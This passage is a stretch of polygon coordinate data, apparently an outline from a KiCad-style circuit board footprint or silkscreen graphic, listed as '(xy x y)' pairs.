(xy 7.651241 -9.697866) (xy 7.448476 -9.687361) (xy 7.148669 -9.683892) (xy 7.03765 -9.68375)
(xy 6.668698 -9.687697) (xy 6.392577 -9.706414) (xy 6.175199 -9.750215) (xy 5.982474 -9.829411)
(xy 5.780311 -9.954316) (xy 5.534621 -10.135242) (xy 5.527644 -10.140559) (xy 5.296059 -10.2919)
(xy 5.130662 -10.338237) (xy 5.024679 -10.278517) (xy 4.971336 -10.111685) (xy 4.96543 -10.053097)
(xy 5.001549 -9.738735) (xy 5.149284 -9.382805) (xy 5.375927 -9.033277) (xy 5.385861 -9.018114)
(xy 9.173241 -9.018114) (xy 9.187645 -9.059349) (xy 9.280812 -9.089498) (xy 9.419235 -9.122212)
(xy 9.549765 -9.131747) (xy 9.711201 -9.116087) (xy 9.942343 -9.073213) (xy 10.057813 -9.049093)
(xy 10.374973 -8.965963) (xy 10.614833 -8.870475) (xy 10.759574 -8.771113) (xy 10.795 -8.698036)
(xy 10.73757 -8.660568) (xy 10.586794 -8.640974) (xy 10.374936 -8.638416) (xy 10.134263 -8.652054)
(xy 9.897041 -8.681049) (xy 9.695536 -8.72456) (xy 9.687837 -8.726842) (xy 9.480899 -8.80461)
(xy 9.308469 -8.895621) (xy 9.258932 -8.932671) (xy 9.173241 -9.018114) (xy 5.385861 -9.018114)
(xy 5.496707 -8.848925) (xy 5.616045 -8.629695) (xy 5.713967 -8.416784) (xy 5.770503 -8.251387)
(xy 5.777105 -8.205803) (xy 5.74777 -8.140949) (xy 5.648826 -8.081675) (xy 5.467418 -8.024304)
(xy 5.190697 -7.965161) (xy 4.805808 -7.900568) (xy 4.60375 -7.870188) (xy 4.19437 -7.809487)
(xy 3.888105 -7.761175) (xy 3.662323 -7.719851) (xy 3.494389 -7.680109) (xy 3.361672 -7.636547)
(xy 3.241539 -7.583762) (xy 3.111358 -7.516348) (xy 3.103064 -7.511898) (xy 2.84563 -7.326389)
(xy 2.698892 -7.110543) (xy 2.667 -6.944087) (xy 2.708941 -6.857538) (xy 2.821375 -6.707561)
(xy 2.984217 -6.51975) (xy 3.07975 -6.418116) (xy 3.259814 -6.224798) (xy 3.400082 -6.061256)
(xy 3.480719 -5.951279) (xy 3.4925 -5.923084) (xy 3.433028 -5.836203) (xy 3.258011 -5.788866)
(xy 2.972544 -5.780931) (xy 2.581721 -5.81226) (xy 2.090638 -5.882713) (xy 1.5875 -5.975385)
(xy 1.052061 -6.071697) (xy 0.562071 -6.139368) (xy 0.132384 -6.177621) (xy -0.22214 -6.185679)
(xy -0.486647 -6.162765) (xy -0.646278 -6.108101) (xy -0.66441 -6.093192) (xy -0.720255 -6.018588)
(xy -0.709505 -5.937993) (xy -0.624806 -5.807772) (xy -0.613782 -5.792774) (xy -0.522275 -5.681186)
(xy -0.500532 -5.656361) (xy 31.3055 -5.656361) (xy 31.364603 -5.765224) (xy 31.52678 -5.879835)
(xy 31.76933 -5.98833) (xy 32.069555 -6.07885) (xy 32.148125 -6.096679) (xy 32.396315 -6.127819)
(xy 32.737623 -6.141076) (xy 33.139661 -6.137957) (xy 33.570036 -6.119972) (xy 33.996358 -6.08863)
(xy 34.386237 -6.04544) (xy 34.70728 -5.991909) (xy 34.786435 -5.973783) (xy 35.219264 -5.846575)
(xy 35.62568 -5.691592) (xy 35.979633 -5.521099) (xy 36.255073 -5.347357) (xy 36.402326 -5.213154)
(xy 36.527014 -5.039606) (xy 36.56798 -4.906684) (xy 36.517965 -4.810814) (xy 36.369706 -4.748418)
(xy 36.115944 -4.715919) (xy 35.749416 -4.70974) (xy 35.40125 -4.720012) (xy 34.783462 -4.757355)
(xy 34.177313 -4.815469) (xy 33.595799 -4.891385) (xy 33.051915 -4.98213) (xy 32.558657 -5.084734)
(xy 32.129022 -5.196226) (xy 31.776005 -5.313634) (xy 31.512602 -5.433988) (xy 31.351808 -5.554317)
(xy 31.3055 -5.656361) (xy -0.500532 -5.656361) (xy -0.360711 -5.496725) (xy -0.146423 -5.258671)
(xy 0.10326 -4.986307) (xy 0.332675 -4.739768) (xy 0.547246 -4.508682) (xy 2.8575 -4.508682)
(xy 2.906731 -4.5661) (xy 3.045818 -4.550838) (xy 3.261847 -4.46483) (xy 3.296687 -4.447527)
(xy 27.8765 -4.447527) (xy 27.929856 -4.514093) (xy 28.051139 -4.562064) (xy 28.083066 -4.566986)
(xy 28.158764 -4.561732) (xy 28.339491 -4.544062) (xy 28.604122 -4.516195) (xy 28.931532 -4.480349)
(xy 29.257816 -4.443624) (xy 30.323385 -4.320119) (xy 31.265844 -4.20629) (xy 32.088671 -4.10158)
(xy 32.795341 -4.005432) (xy 33.389332 -3.917289) (xy 33.874121 -3.836593) (xy 34.253186 -3.762788)
(xy 34.530003 -3.695317) (xy 34.708049 -3.633622) (xy 34.790802 -3.577147) (xy 34.798 -3.556)
(xy 34.737532 -3.490976) (xy 34.56665 -3.440241) (xy 34.301133 -3.403807) (xy 33.956762 -3.381687)
(xy 33.549317 -3.373891) (xy 33.094577 -3.380432) (xy 32.608324 -3.401322) (xy 32.106337 -3.436573)
(xy 31.604397 -3.486196) (xy 31.118284 -3.550204) (xy 31.098449 -3.553207) (xy 30.631096 -3.63186)
(xy 30.153167 -3.725743) (xy 29.680981 -3.830326) (xy 29.230858 -3.941079) (xy 28.819116 -4.053472)
(xy 28.462076 -4.162976) (xy 28.176056 -4.26506) (xy 27.977377 -4.355196) (xy 27.882356 -4.428852)
(xy 27.8765 -4.447527) (xy 3.296687 -4.447527) (xy 3.310194 -4.440819) (xy 3.521961 -4.311816)
(xy 3.730773 -4.148998) (xy 3.921859 -3.969818) (xy 4.08045 -3.79173) (xy 4.191774 -3.632187)
(xy 4.24106 -3.508641) (xy 4.213539 -3.438548) (xy 4.166486 -3.429) (xy 4.037259 -3.4697)
(xy 3.849319 -3.578328) (xy 3.627165 -3.734677) (xy 3.395297 -3.918538) (xy 3.178215 -4.109702)
(xy 3.00042 -4.287962) (xy 2.886411 -4.433109) (xy 2.8575 -4.508682) (xy 0.547246 -4.508682)
(xy 0.680308 -4.365379) (xy 0.945112 -4.071631) (xy 1.134253 -3.849555) (xy 1.2549 -3.690182)
(xy 1.314217 -3.584541) (xy 1.319371 -3.523665) (xy 1.312333 -3.513666) (xy 1.272022 -3.503341)
(xy 1.19771 -3.533039) (xy 1.07711 -3.611553) (xy 0.897937 -3.747673) (xy 0.647902 -3.950192)
(xy 0.317865 -4.225261) (xy -0.098616 -4.566866) (xy -0.434852 -4.823655) (xy -0.699567 -5.001442)
(xy -0.901484 -5.106037) (xy -1.049328 -5.143256) (xy -1.060183 -5.1435) (xy -1.152249 -5.123335)
(xy -1.196752 -5.052338) (xy -1.192848 -4.914755) (xy -1.139693 -4.69483) (xy -1.036446 -4.37681)
(xy -1.016 -4.318) (xy -0.914263 -3.993986) (xy -0.850042 -3.718454) (xy -0.826038 -3.510446)
(xy -0.844949 -3.389002) (xy -0.881017 -3.3655) (xy -0.970021 -3.385175) (xy -1.130734 -3.4349)
(xy -1.214392 -3.463566) (xy -1.542174 -3.561009) (xy -1.953359 -3.656379) (xy -2.406433 -3.742491)
(xy -2.859878 -3.812157) (xy -3.272179 -3.858192) (xy -3.58274 -3.8735) (xy -3.854847 -3.870323)
(xy -4.033145 -3.855805) (xy -4.150768 -3.822468) (xy -4.240847 -3.762831) (xy -4.293793 -3.712979)
(xy -4.381174 -3.60237) (xy -4.418288 -3.478348) (xy -4.401948 -3.318273) (xy -4.328963 -3.099502)
(xy -4.196146 -2.799393) (xy -4.152034 -2.706533) (xy -4.080629 -2.550169) (xy -2.720681 -2.550169)
(xy -2.715253 -2.595213) (xy -2.678428 -2.603872) (xy -2.645834 -2.6035) (xy -2.555359 -2.561423)
(xy -2.417183 -2.453893) (xy -2.328334 -2.370666) (xy -2.171371 -2.185334) (xy -2.103249 -2.018532)
(xy -2.0955 -1.926166) (xy -2.125837 -1.772172) (xy -2.204641 -1.715646) (xy -2.313601 -1.74603)
(xy -2.434408 -1.852765) (xy -2.548751 -2.025294) (xy -2.633495 -2.236396) (xy -2.693749 -2.440108)
(xy -2.720681 -2.550169) (xy -4.080629 -2.550169) (xy -4.023275 -2.424578) (xy -3.955169 -2.238199)
(xy -3.944184 -2.133386) (xy -3.986788 -2.096128) (xy -3.99799 -2.0955) (xy -4.075284 -2.123413)
(xy -4.240224 -2.199361) (xy -4.468377 -2.311652) (xy -4.727945 -2.44475) (xy -5.005234 -2.582807)
(xy -5.255235 -2.695102) (xy -5.449227 -2.769488) (xy -5.553746 -2.794) (xy -5.739419 -2.851718)
(xy -5.963281 -3.025663) (xy -6.226555 -3.31702) (xy -6.530469 -3.726974) (xy -6.554616 -3.76207)
(xy -6.847842 -4.152561) (xy -7.112241 -4.426574) (xy -7.345731 -4.582376) (xy -7.546231 -4.618231)
(xy -7.575661 -4.612583) (xy -7.728424 -4.512806) (xy -7.832614 -4.318388) (xy -7.873843 -4.057002)
(xy -7.874 -4.038737) (xy -7.903027 -3.779753) (xy -7.979723 -3.551264) (xy -8.088512 -3.394238)
(xy -8.130505 -3.364159) (xy -8.278856 -3.318478) (xy -8.441326 -3.302) (xy -8.585071 -3.285467)
(xy -8.623137 -3.230417) (xy -8.553971 -3.128675) (xy -8.37924 -2.974646) (xy -8.191173 -2.799426)
(xy -8.027384 -2.604587) (xy -7.913274 -2.424102) (xy -7.874 -2.298915) (xy -7.930919 -2.174617)
(xy -8.08362 -2.086913) (xy -8.305022 -2.040247) (xy -8.568043 -2.039065) (xy -8.845604 -2.087813)
(xy -8.953189 -2.121766) (xy -9.132709 -2.217686) (xy -9.265151 -2.369504) (xy -9.359581 -2.596451)
(xy -9.425067 -2.917758) (xy -9.456729 -3.189716) (xy -9.538305 -3.701758) (xy -9.675723 -4.100391)
(xy -9.869531 -4.38654) (xy -10.120278 -4.561127) (xy -10.303401 -4.613559) (xy -10.457338 -4.618446)
(xy -10.57325 -4.566263) (xy -10.658552 -4.442146) (xy -10.720665 -4.231234) (xy -10.767006 -3.918664)
(xy -10.794119 -3.63034) (xy -10.847109 -3.172269) (xy -10.922928 -2.835615) (xy -11.023659 -2.6165)
(xy -11.151387 -2.511047) (xy -11.308196 -2.515377) (xy -11.377109 -2.545677) (xy -11.473913 -2.644094)
(xy -11.591877 -2.832246) (xy -11.713896 -3.078772) (xy -11.822865 -3.352306) (xy -11.832872 -3.381375)
(xy -11.896289 -3.479497) (xy -11.983349 -3.458719) (xy -12.09885 -3.31743) (xy -12.119359 -3.285041)
(xy -12.28661 -3.054091) (xy -12.452094 -2.894942) (xy -12.595513 -2.824844) (xy -12.655308 -2.82957)
(xy -12.755618 -2.929898) (xy -12.827787 -3.121781) (xy -12.869918 -3.372517) (xy -12.880114 -3.649403)
(xy -12.85648 -3.919734) (xy -12.797117 -4.150808) (xy -12.738525 -4.26439) (xy -12.631844 -4.367007)
(xy -12.448634 -4.497492) (xy -12.226953 -4.62896) (xy -12.208468 -4.638836) (xy -11.887376 -4.843111)
(xy -11.674275 -5.05553) (xy -11.575849 -5.267826) (xy -11.579847 -5.416381) (xy -11.607427 -5.488615)
(xy -11.664024 -5.531389) (xy -11.777803 -5.552287) (xy -11.976933 -5.558894) (xy -12.110293 -5.559217)
(xy -12.397284 -5.567109) (xy -12.60916 -5.598536) (xy -12.797133 -5.663967) (xy -12.92225 -5.725216)
(xy -13.190052 -5.883704) (xy -13.357148 -6.034272) (xy -13.445524 -6.201806) (xy -13.472911 -6.348551)
(xy -13.5028 -6.490609) (xy -13.57321 -6.593169) (xy -13.70164 -6.662296) (xy -13.905591 -6.70405)
(xy -14.202564 -6.724492) (xy -14.57325 -6.729689) (xy -15.35102 -6.698371) (xy -16.113815 -6.607239)
(xy -16.815957 -6.462233) (xy -16.983155 -6.416378) (xy -17.143667 -6.36956) (xy -17.257351 -6.340052)
(xy -17.317196 -6.336019) (xy -17.31619 -6.36563) (xy -17.247323 -6.437051) (xy -17.103582 -6.558452)
(xy -16.877955 -6.737998) (xy -16.563433 -6.983857) (xy -16.359357 -7.143013) (xy -15.935683 -7.476324)
(xy -15.605121 -7.743495) (xy -15.358321 -7.953426) (xy -15.185935 -8.115015) (xy -15.078612 -8.237162)
(xy -15.027004 -8.328766) (xy -15.021762 -8.398726) (xy -15.025959 -8.412243) (xy -15.114198 -8.48847)
(xy -15.29442 -8.49137) (xy -15.569619 -8.420343) (xy -15.942788 -8.274791) (xy -16.128749 -8.191616)
(xy -16.374383 -8.08187) (xy -16.573724 -7.999224) (xy -16.701204 -7.953906) (xy -16.733759 -7.949591)
(xy -16.727474 -8.017327) (xy -16.688746 -8.175576) (xy -16.625202 -8.394336) (xy -16.600926 -8.472047)
(xy -16.509248 -8.805834) (xy -16.485932 -9.044998) (xy -16.539903 -9.207147) (xy -16.680087 -9.309891)
(xy -16.915407 -9.370839) (xy -17.06647 -9.390601) (xy -17.300482 -9.433281) (xy -17.427523 -9.51154)
(xy -17.456382 -9.644344) (xy -17.395847 -9.850656) (xy -17.338938 -9.978568) (xy -17.150188 -10.314305)
(xy -16.945849 -10.542302) (xy -16.707953 -10.681798) (xy -16.66875 -10.696112) (xy -16.505677 -10.77344)
(xy -16.405161 -10.861985) (xy -16.39331 -10.888861) (xy -16.418127 -11.042783) (xy -16.560135 -11.177952)
(xy -16.821472 -11.295279) (xy -17.204277 -11.395675) (xy -17.710687 -11.480052) (xy -17.81175 -11.493185)
(xy -18.179007 -11.553925) (xy -18.448308 -11.630136) (xy -18.610422 -11.718142) (xy -18.656115 -11.814265)
(xy -31.309748 -11.814265) (xy -31.501106 -11.742609) (xy -31.767114 -11.650329) (xy -32.021049 -11.573089)
(xy -32.296825 -11.501381) (xy -32.628353 -11.425698) (xy -33.049548 -11.33653) (xy -33.067316 -11.332844)
(xy -33.487806 -11.236213) (xy -33.791088 -11.143627) (xy -33.986696 -11.051016) (xy -34.084163 -10.954315)
(xy -34.099501 -10.892481) (xy -34.139103 -10.80388) (xy -34.243747 -10.652368) (xy -34.39219 -10.468221)
(xy -34.418448 -10.437911) (xy -34.56814 -10.255402) (xy -34.67364 -10.104559) (xy -34.715636 -10.013542)
(xy -34.714929 -10.005591) (xy -34.645003 -9.965368) (xy -34.483587 -9.925616) (xy -34.270365 -9.895505)
(xy -33.89286 -9.842574) (xy -33.562107 -9.7563) (xy -33.219653 -9.619249) (xy -33.016201 -9.521455)
(xy -32.730039 -9.360406) (xy -32.568017 -9.225635) (xy -32.530173 -9.11718) (xy -32.555434 -9.075166)
(xy -32.661701 -9.020807) (xy -32.882207 -8.949994) (xy -33.205586 -8.865044) (xy -33.620471 -8.768276)
(xy -34.115498 -8.662008) (xy -34.679298 -8.548558) (xy -35.300508 -8.430244) (xy -35.967759 -8.309385)
(xy -36.669687 -8.188298) (xy -37.394926 -8.069302) (xy -37.799978 -8.00553) (xy -38.336955 -7.918524)
(xy -38.758804 -7.841105) (xy -39.07679 -7.770425) (xy -39.302176 -7.703636) (xy -39.446224 -7.637889)
(xy -39.520057 -7.570566) (xy -39.523966 -7.482642) (xy -39.498848 -7.307749) (xy -39.450017 -7.081187)
(xy -39.440919 -7.044705) (xy -39.369713 -6.792833) (xy -39.30397 -6.638692) (xy -39.229346 -6.554568)
(xy -39.172086 -6.525329) (xy -39.082509 -6.50254) (xy -38.963001 -6.49322) (xy -38.802708 -6.499124)
(xy -38.590777 -6.522009) (xy -38.316355 -6.563629) (xy -37.968588 -6.62574) (xy -37.536624 -6.710099)
(xy -37.009609 -6.81846) (xy -36.37669 -6.95258) (xy -35.90925 -7.05313) (xy -34.819374 -7.283698)
(xy -33.843876 -7.479541) (xy -32.975308 -7.641806) (xy -32.206218 -7.77164) (xy -31.529158 -7.870189)
(xy -30.936677 -7.9386) (xy -30.421325 -7.978019) (xy -29.975653 -7.989593) (xy -29.839002 -7.987398)
(xy -29.492255 -7.968807) (xy -29.266953 -7.937015) (xy -29.158424 -7.893752) (xy -29.161994 -7.840752)
(xy -29.27299 -7.779746) (xy -29.48674 -7.712465) (xy -29.798569 -7.640643) (xy -30.203806 -7.566011)
(xy -30.697776 -7.4903) (xy -31.275806 -7.415243) (xy -31.4325 -7.39683) (xy -31.965129 -7.328973)
(xy -32.448076 -7.254749) (xy -32.866213 -7.177287) (xy -33.204414 -7.099717) (xy -33.447549 -7.025169)
(xy -33.58049 -6.956773) (xy -33.586356 -6.951208) (xy -33.61101 -6.917556) (xy -33.600441 -6.893122)
(xy -33.540337 -6.877237) (xy -33.416388 -6.869231) (xy -33.214282 -6.868436) (xy -32.919709 -6.874181)
(xy -32.518358 -6.885798) (xy -32.3215 -6.892042) (xy -31.814047 -6.905728) (xy -31.432017 -6.910095)
(xy -31.174172 -6.905126) (xy -31.039276 -6.8908) (xy -31.01975 -6.871841) (xy -31.119377 -6.813438)
(xy -31.3293 -6.723056) (xy -31.638058 -6.604835) (xy -32.034192 -6.46292) (xy -32.506245 -6.301454)
(xy -33.042755 -6.124578) (xy -33.43275 -5.999457) (xy -34.047277 -5.800005) (xy -34.548636 -5.625093)
(xy -34.946638 -5.467552) (xy -35.251094 -5.320214) (xy -35.471816 -5.175912) (xy -35.618613 -5.027476)
(xy -35.701297 -4.867739) (xy -35.729679 -4.689533) (xy -35.713568 -4.48569) (xy -35.687513 -4.352035)
(xy -35.661901 -4.205018) (xy -35.664434 -4.080475) (xy -35.706366 -3.972136) (xy -35.79895 -3.87373)
(xy -35.953439 -3.778987) (xy -36.181085 -3.681635) (xy -36.493141 -3.575404) (xy -36.900861 -3.454023)
(xy -37.415498 -3.311222) (xy -37.68725 -3.237686) (xy -38.529711 -3.000727) (xy -39.257682 -2.774068)
(xy -39.882871 -2.553744) (xy -40.416984 -2.335788) (xy -40.608756 -2.247903) (xy -40.928718 -2.082644)
(xy -41.189184 -1.921688) (xy -41.372328 -1.777742) (xy -41.460321 -1.663517) (xy -41.465501 -1.637096)
(xy -41.462945 -1.61588) (xy -41.446416 -1.601226) (xy -41.402622 -1.594514) (xy -41.318271 -1.597124)
(xy -41.180073 -1.610437) (xy -40.974734 -1.635833) (xy -40.688963 -1.67469) (xy -40.309469 -1.728391)
(xy -39.822959 -1.798313) (xy -39.59225 -1.83159) (xy -39.231852 -1.881662) (xy -38.767442 -1.943174)
(xy -38.22121 -2.013349) (xy -37.615347 -2.089412) (xy -36.972041 -2.168583) (xy -36.313484 -2.248088)
(xy -35.661865 -2.325149) (xy -35.46475 -2.348107) (xy -34.410513 -2.471079) (xy -33.418683 -2.588115)
(xy -32.496416 -2.698325) (xy -31.650867 -2.800819) (xy -30.889192 -2.894707) (xy -30.218547 -2.9791)
(xy -29.646087 -3.053106) (xy -29.178969 -3.115837) (xy -28.824349 -3.166401) (xy -28.603514 -3.201427)
(xy -28.309702 -3.240336) (xy -28.12999 -3.235518) (xy -28.066241 -3.18737) (xy -28.118567 -3.098033)
(xy -28.229674 -3.036273) (xy -28.457734 -2.952489) (xy -28.795009 -2.848766) (xy -29.233762 -2.727191)
(xy -29.766254 -2.589851) (xy -30.384748 -2.438833) (xy -31.081507 -2.276222) (xy -31.600404 -2.159122)
(xy -32.361676 -1.988133) (xy -33.011718 -1.838564) (xy -33.530431 -1.714564) (xy 19.132848 -1.714564)
(xy 19.185837 -1.806678) (xy 19.239081 -1.85312) (xy 19.416237 -1.93466) (xy 19.648324 -1.966893)
(xy 19.876733 -1.947407) (xy 20.028143 -1.885567) (xy 20.114322 -1.756693) (xy 20.102503 -1.598868)
(xy 20.000924 -1.452731) (xy 19.930272 -1.402804) (xy 19.794582 -1.347222) (xy 19.651086 -1.349346)
(xy 19.502683 -1.387045) (xy 19.319371 -1.468279) (xy 19.188645 -1.573354) (xy 19.169582 -1.601358)
(xy 19.132848 -1.714564) (xy -33.530431 -1.714564) (xy -33.563771 -1.706594) (xy -34.031071 -1.588403)
(xy -34.426856 -1.48017) (xy -34.764365 -1.378074) (xy -35.056835 -1.278294) (xy -35.317505 -1.17701)
(xy -35.559612 -1.0704) (xy -35.796395 -0.954645) (xy -35.825842 -0.939566) (xy -36.083235 -0.789417)
(xy -36.33099 -0.613914) (xy -36.550537 -0.430458) (xy -36.723308 -0.256453) (xy -36.830734 -0.109299)
(xy -36.854247 -0.0064) (xy -36.842329 0.013072) (xy -36.744431 0.035306) (xy -36.536518 0.025825)
(xy -36.23103 -0.013417) (xy -35.840408 -0.080465) (xy -35.377092 -0.173364) (xy -34.853523 -0.290159)
(xy -34.7345 -0.318152) (xy -34.290026 -0.41753) (xy -33.947301 -0.47809) (xy -33.687385 -0.500554)
(xy -33.491341 -0.485643) (xy -33.340227 -0.434079) (xy -33.248709 -0.374735) (xy -33.116315 -0.232391)
(xy -32.977972 -0.025655) (xy -32.858149 0.201185) (xy -32.781317 0.403844) (xy -32.766001 0.498904)
(xy -32.812834 0.651474) (xy -32.942836 0.867655) (xy -33.14026 1.131402) (xy -33.38936 1.426671)
(xy -33.4254 1.465963) (xy 36.08853 1.465963) (xy 36.125248 1.381854) (xy 36.268659 1.308444)
(xy 36.429896 1.267832) (xy 36.705917 1.233867) (xy 37.060136 1.217442) (xy 37.444995 1.218359)
(xy 37.812936 1.236422) (xy 38.116401 1.271436) (xy 38.135962 1.274871) (xy 38.476461 1.359687)
(xy 38.694425 1.468939) (xy 38.792206 1.603973) (xy 38.7985 1.654036) (xy 38.751932 1.770305)
(xy 38.606978 1.852294) (xy 38.355764 1.90229) (xy 37.990414 1.922578) (xy 37.871051 1.923259)
(xy 37.476868 1.90794) (xy 37.110391 1.867398) (xy 36.782904 1.806765) (xy 36.505691 1.731173)
(xy 36.290035 1.645755) (xy 36.14722 1.555641) (xy 36.08853 1.465963) (xy -33.4254 1.465963)
(xy -33.674389 1.737419) (xy -33.979601 2.047602) (xy -34.28925 2.341176) (xy -34.587588 2.602096)
(xy -34.85887 2.81432) (xy -35.087349 2.961803) (xy -35.246895 3.026654) (xy -35.474627 3.131674)
(xy -35.627744 3.336388) (xy -35.68113 3.50535) (xy -35.720918 3.637385) (xy -35.796158 3.707574)
(xy -35.946969 3.746809) (xy -36.007017 3.756277) (xy -36.262123 3.818411) (xy -36.617123 3.943744)
(xy -37.073738 4.13302) (xy -37.63369 4.386981) (xy -38.298703 4.706368) (xy -38.862 4.98655)
(xy -39.45722 5.290256) (xy -39.942354 5.547367) (xy -40.323686 5.762158) (xy -40.607498 5.938904)
(xy -40.800073 6.081878) (xy -40.907692 6.195357) (xy -40.936639 6.283614) (xy -40.893195 6.350924)
(xy -40.880276 6.359826) (xy -40.740255 6.399215) (xy -40.509865 6.412426) (xy -40.222611 6.401295)
(xy -39.911996 6.367657) (xy -39.611524 6.313349) (xy -39.492706 6.283803) (xy -38.873504 6.127574)
(xy -38.358591 6.029314) (xy -37.93936 5.988817) (xy -37.607207 6.005882) (xy -37.353527 6.080304)
(xy -37.169713 6.211879) (xy -37.154581 6.22847) (xy -37.012804 6.349931) (xy -36.871978 6.411581)
(xy -36.849829 6.4135) (xy -36.720749 6.400249) (xy -36.54689 6.358394) (xy -36.321012 6.284789)
(xy -36.035878 6.176283) (xy -35.684252 6.029729) (xy -35.258894 5.841977) (xy -34.752567 5.609879)
(xy -34.158034 5.330285) (xy -33.468056 5.000049) (xy -32.675396 4.61602) (xy -32.3215 4.443487)
(xy -31.57776 4.081572) (xy -30.938275 3.773269) (xy -30.39411 3.514597) (xy -29.936333 3.301572)
(xy -29.556009 3.130212) (xy -29.244204 2.996534) (xy -28.991985 2.896555) (xy -28.790418 2.826291)
(xy -28.630568 2.781761) (xy -28.562615 2.767745) (xy -28.389669 2.754375) (xy -28.255984 2.804152)
(xy -28.133832 2.902903) (xy -27.997006 3.06889) (xy -27.908558 3.251407) (xy -27.900752 3.283143)
(xy -27.910668 3.435976) (xy -27.964314 3.546175) (xy -25.3365 3.546175) (xy -25.284253 3.445544)
(xy -25.146469 3.311826) (xy -24.951583 3.167965) (xy -24.728032 3.036903) (xy -24.66975 3.008237)
(xy -24.40467 2.898651) (xy -24.226519 2.864159) (xy -24.120759 2.903476) (xy -24.08791 2.9568)
(xy -24.086796 3.123286) (xy -24.187943 3.297509) (xy -24.372181 3.450001) (xy -24.429086 3.481329)
(xy -24.590402 3.547487) (xy -14.207578 3.547487) (xy -14.202862 3.374954) (xy -14.144363 3.191446)
(xy -14.047415 3.034982) (xy -13.927354 2.94358) (xy -13.846906 2.936485) (xy -13.780868 2.990046)
(xy -13.754705 3.131095) (xy -13.754021 3.235274) (xy -13.781566 3.451849) (xy -13.863963 3.593681)
(xy -13.905112 3.631145) (xy -14.026121 3.706494) (xy -14.116433 3.690866) (xy -14.143177 3.671028)
(xy -14.207578 3.547487) (xy -24.590402 3.547487) (xy -24.6796 3.584068) (xy -24.922543 3.644326)
(xy -25.130958 3.660175) (xy -25.277889 3.629689) (xy -25.33638 3.550943) (xy -25.3365 3.546175)
(xy -27.964314 3.546175) (xy -27.99748 3.614304) (xy -28.16567 3.821624) (xy -28.419719 4.061438)
(xy -28.764108 4.337244) (xy -29.20332 4.652542) (xy -29.741834 5.010831) (xy -30.384134 5.415612)
(xy -31.134699 5.870383) (xy -31.46425 6.065896) (xy -31.748777 6.235437) (xy -6.530893 6.235437)
(xy -6.465992 5.978632) (xy -6.34439 5.719516) (xy -6.176812 5.487557) (xy -5.973985 5.312225)
(xy -5.969 5.309098) (xy -5.794335 5.22276) (xy -5.673624 5.227355) (xy -5.631395 5.262946)
(xy 20.968946 5.262946) (xy 20.998343 5.205864) (xy 21.131952 5.219683) (xy 21.369249 5.304609)
(xy 21.638284 5.426228) (xy 21.858931 5.538737) (xy 22.154809 5.699133) (xy 22.492825 5.889007)
(xy 22.839885 6.08995) (xy 22.969993 6.167015) (xy 23.311019 6.366508) (xy 23.655394 6.561084)
(xy 23.970229 6.732611) (xy 24.222635 6.862953) (xy 24.297516 6.898925) (xy 24.769034 7.186479)
(xy 25.164891 7.573258) (xy 25.203749 7.632829) (xy 25.81694 7.632829) (xy 25.893746 7.648738)
(xy 26.067389 7.729518) (xy 26.116904 7.754254) (xy 26.386083 7.903314) (xy 26.592845 8.04529)
(xy 26.720798 8.166679) (xy 26.753548 8.253979) (xy 26.74352 8.27038) (xy 26.619591 8.311987)
(xy 26.444428 8.266909) (xy 26.243857 8.149412) (xy 26.043704 7.973762) (xy 25.906045 7.807755)
(xy 25.825023 7.684825) (xy 25.81694 7.632829) (xy 25.203749 7.632829) (xy 25.476156 8.050432)
(xy 25.490185 8.078203) (xy 25.598569 8.341412) (xy 25.649204 8.567735) (xy 25.638334 8.730997)
(xy 25.592816 8.793319) (xy 25.518135 8.773142) (xy 25.39028 8.681244) (xy 25.285153 8.584654)
(xy 25.078209 8.400905) (xy 24.761563 8.153796) (xy 24.335476 7.843517) (xy 23.800205 7.470253)
(xy 23.156009 7.034192) (xy 22.987 6.921397) (xy 22.497388 6.59094) (xy 22.100169 6.311981)
(xy 21.778274 6.071616) (xy 21.514637 5.85694) (xy 21.292191 5.655048) (xy 21.224875 5.58899)
(xy 21.044282 5.390723) (xy 20.968946 5.262946) (xy -5.631395 5.262946) (xy -5.595545 5.29316)
(xy -5.553105 5.434299) (xy -5.577432 5.644304) (xy -5.654462 5.894083) (xy -5.710193 6.019574)
(xy 17.0815 6.019574) (xy 17.127874 5.970079) (xy 17.266876 6.00721) (xy 17.498323 6.130902)
(xy 17.637126 6.217719) (xy 18.044742 6.50601) (xy 18.366195 6.785645) (xy 18.592246 7.0467)
(xy 18.713657 7.279248) (xy 18.7325 7.394597) (xy 18.692079 7.481357) (xy 18.574965 7.474068)
(xy 18.387379 7.374883) (xy 18.140369 7.189934) (xy 17.962465 7.031343) (xy 17.760045 6.832475)
(xy 17.553215 6.615552) (xy 17.362079 6.402796) (xy 17.206744 6.21643) (xy 17.107314 6.078676)
(xy 17.0815 6.019574) (xy -5.710193 6.019574) (xy -5.770135 6.154544) (xy -5.910389 6.396593)
(xy -6.061161 6.59114) (xy -6.20839 6.709091) (xy -6.290528 6.731) (xy -6.370181 6.690714)
(xy -6.447688 6.624242) (xy -6.528367 6.460463) (xy -6.530893 6.235437) (xy -31.748777 6.235437)
(xy -32.133437 6.464643) (xy -32.711256 6.818294) (xy -33.218641 7.14106) (xy -33.676527 7.44715)
(xy -34.105848 7.750774) (xy -34.52754 8.066143) (xy -34.962535 8.407465) (xy -35.21848 8.614208)
(xy -35.572404 8.913227) (xy -35.877486 9.192137) (xy -36.121551 9.438361) (xy -36.292422 9.63932)
(xy -36.377924 9.782438) (xy -36.385501 9.819691) (xy -36.32816 9.880893) (xy -36.159099 9.892173)
(xy -35.882762 9.854941) (xy -35.503592 9.770611) (xy -35.026031 9.640592) (xy -34.454522 9.466298)
(xy -33.79351 9.249139) (xy -33.047436 8.990527) (xy -32.220744 8.691875) (xy -31.317877 8.354593)
(xy -30.343278 7.980094) (xy -29.30139 7.569789) (xy -29.289894 7.56521) (xy -28.706674 7.334061)
(xy -28.230235 7.148232) (xy -27.850116 7.004228) (xy -27.555856 6.89855) (xy -27.336992 6.8277)
(xy -27.183065 6.788181) (xy -27.083613 6.776496) (xy -27.028174 6.789147) (xy -27.01334 6.804065)
(xy -27.027538 6.898448) (xy -27.142853 7.050389) (xy -27.350677 7.253496) (xy -27.371745 7.271398)
(xy 12.7635 7.271398) (xy 12.802238 7.267127) (xy 12.90726 7.342212) (xy 13.061777 7.479945)
(xy 13.249002 7.663618) (xy 13.452145 7.876525) (xy 13.654418 8.101959) (xy 13.839032 8.323212)
(xy 13.903365 8.405739) (xy 14.152778 8.750974) (xy 14.242404 8.88824) (xy 18.099492 8.88824)
(xy 18.113826 8.831343) (xy 18.220894 8.859361) (xy 18.422882 8.970521) (xy 18.57978 9.069403)
